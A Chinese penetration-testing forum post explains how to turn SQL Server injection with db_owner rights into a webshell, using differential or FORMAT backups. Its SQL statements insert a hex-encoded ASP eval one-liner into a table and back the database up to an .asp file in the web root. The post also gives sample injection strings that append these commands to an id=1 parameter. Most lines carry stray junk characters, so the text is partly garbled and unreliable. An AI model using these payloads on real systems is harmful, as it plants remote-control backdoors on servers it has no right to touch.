中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]

作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少' E3 a( L2 Z* K) e2 W1 Y& n- i
# ]$ J; s4 `0 N6 q
一利用差异备份# ?" y; |6 f$ _
加一个参数WITH DIFFERENTIAL% Q  x6 h0 l  }( U+ V* F2 r9 T
- p9 \  |; x2 C& M( V, E
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s$ H6 d2 t' l7 H7 G4 D$ v
create table [dbo].[xiaolu] ([cmd] [image]);
. t( f, ~+ }0 b4 Qinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
$ R7 j& p$ |* _  @- F3 j3 ?- tdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL# E. l; q. B, J: Y+ J: e& N" [6 l
; k0 F; b/ `7 Z/ f6 t' z
二利用完全FORMAT! d3 E6 q+ d2 ~. e# @
加一个参数WITH FROMAT8 K* p6 R# m2 ^) |
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以' j, R2 h9 p( U3 U2 D
5 d5 {* A  g, I; Z9 U
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s+ s( V& s6 v& U
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)) k  W/ O% H/ I9 D2 C5 }0 X
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
' I4 i. c$ W9 W5 m& r. A' ?
2 [, ^' x1 E2 w' V! X  S总的来说就是那么简单几句,下面以备份数据库model为例子5 p! e$ M9 h. ^' U3 a; p& ?5 j
1 [- D- Y" u( p
id=1;use model create table cmd(str image);insert into cmd(str) values (”)2 z. y2 V. W! _$ A  f( w' d
1 D" W  x4 {8 {
id=1;backup database model to disk=’你的路径‘ with differential,format;–
5 n3 A% _/ v5 F; F; o6 M" {
6 R  E5 V! U+ d- V




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2